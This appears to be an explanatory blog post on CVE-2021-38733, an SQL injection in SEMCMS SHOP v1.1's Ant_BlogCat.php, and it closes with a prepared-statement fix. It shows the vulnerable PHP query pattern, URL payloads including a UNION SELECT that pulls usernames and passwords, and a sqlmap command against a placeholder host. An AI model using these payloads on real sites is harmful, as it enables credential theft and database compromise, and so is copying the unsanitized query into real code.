CVE-2021-38733 - SEMCMS SHOP v1.1 SQL Injection Explained (with Exploit Example)

The world of e-commerce software is full of security holes, and SEMCMS SHOP v1.1 is no exception. In 2021, a critical SQL Injection vulnerability was discovered in the platform’s Ant_BlogCat.php file. If you run this version of SEMCMS SHOP or you’re just curious about how SQL injections work, keep reading. This article breaks down the vulnerability, shows you how attackers exploit it, and helps you understand why it's dangerous.

What Is CVE-2021-38733?

CVE-2021-38733 is a unique identifier for a security vulnerability found in SEMCMS SHOP v1.1. The problem? The Ant_BlogCat.php script doesn’t properly clean (sanitize) data coming from user input, specifically the id parameter. As a result, attackers can inject dangerous SQL commands—potentially stealing data, taking over the site, or even wiping out the database.

Original reference:  
- CVE-2021-38733 on NVD (NIST)  
- Exploit Database reference

The Vulnerable Code

Let’s take a look at a stripped-down, simplified version of the problematic code in Ant_BlogCat.php:

<?php
// Ant_BlogCat.php (simplified)
include("config.php");                  // Database connection

$id = $_GET['id'];                      // Gets the id from URL, e.g., Ant_BlogCat.php?id=2

$sql = "SELECT * FROM sc_blogcat WHERE id = $id";  // Dangerous!
$result = mysqli_query($conn, $sql);    // Executes the query

// Display results (simplified)
$data = mysqli_fetch_assoc($result);
echo $data['title'];
?>

The issue:
There’s no input filtering or validation on the $id variable before placing it directly into the SQL query. An attacker can manipulate this value and execute any SQL command they want.

Let’s say you’re browsing a SEMCMS SHOP site and notice this page

http://example.com/Ant_BlogCat.php?id=2

Instead of 2, an attacker could try

http://example.com/Ant_BlogCat.php?id=2 OR 1=1

This makes the SQL query look like

SELECT * FROM sc_blogcat WHERE id = 2 OR 1=1

OR 1=1 is always true, so the query returns all blog category records—possibly leaking sensitive data.

Dumping the Database via Union Select

Now, let's get a little more aggressive. Suppose an attacker wants to fetch usernames and passwords from a users table. They might use:

http://example.com/Ant_BlogCat.php?id=2 UNION SELECT 1,username,password FROM sc_users--

The double dash -- comments out the rest of the SQL query.

Here’s the full attack in action, using SQLMap (a popular automated tool) to extract database info

sqlmap -u "http://example.com/Ant_BlogCat.php?id=2" --dbs

This will automatically detect the injection point and dump database names. If authorized, an attacker could fetch tables, records, and even credentials.

Don’t trust user input! Here are some mitigations

- Use Prepared Statements / Parameterized Queries:

$stmt = $conn->prepare("SELECT * FROM sc_blogcat WHERE id = ?");
$stmt->bind_param("i", $_GET['id']);
$stmt->execute();

Summary

CVE-2021-38733 is a textbook SQL injection bug in SEMCMS SHOP v1.1’s Ant_BlogCat.php. It’s both easy to exploit and potentially catastrophic for any online shop that ignores best practices. If you’re running this software, patch it or protect it now. And if you’re just learning, remember: never, ever trust user input in your code.

Further Reading

- OWASP SQL Injection
- PHP: Prepared Statements
- Original Exploit Report (Exploit-DB #50214)


👉 If you enjoyed this breakdown, share to help others protect their sites!

Timeline

Published on: 10/28/2022 16:15:00 UTC
Last modified on: 10/28/2022 18:49:00 UTC